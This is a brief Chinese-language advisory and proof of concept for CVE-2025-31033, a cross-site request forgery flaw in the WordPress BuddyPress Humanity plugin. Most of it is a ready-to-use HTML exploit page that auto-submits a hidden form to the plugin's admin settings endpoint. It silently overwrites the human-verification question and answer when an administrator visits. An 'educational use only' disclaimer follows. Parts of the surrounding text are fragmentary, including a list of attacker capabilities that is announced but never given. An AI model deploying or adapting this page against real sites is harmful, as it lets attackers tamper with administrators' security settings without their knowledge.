WordPress 的 Buddypress Humanity 插件(版本 <= 1.2)存在跨站请求伪造 (CSRF) 漏洞。
该漏洞允许攻击者强制拥有更高权限的用户(如管理员)在不知情的情况下修改插件设置(例如安全问题及答案),从而绕过用户验证逻辑。
bph-settings 页面(仅管理员)CVE-2025-31033若成功利用,攻击者可:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ 一旦经过身份验证的管理员打开此页面,插件设置将被静默修改。
本概念验证仅供教育目的使用。
请负责任地使用,不要在非您拥有的系统上进行测试。
作者不对任何滥用或损害负责。
Nxploited | Khaled Alenazi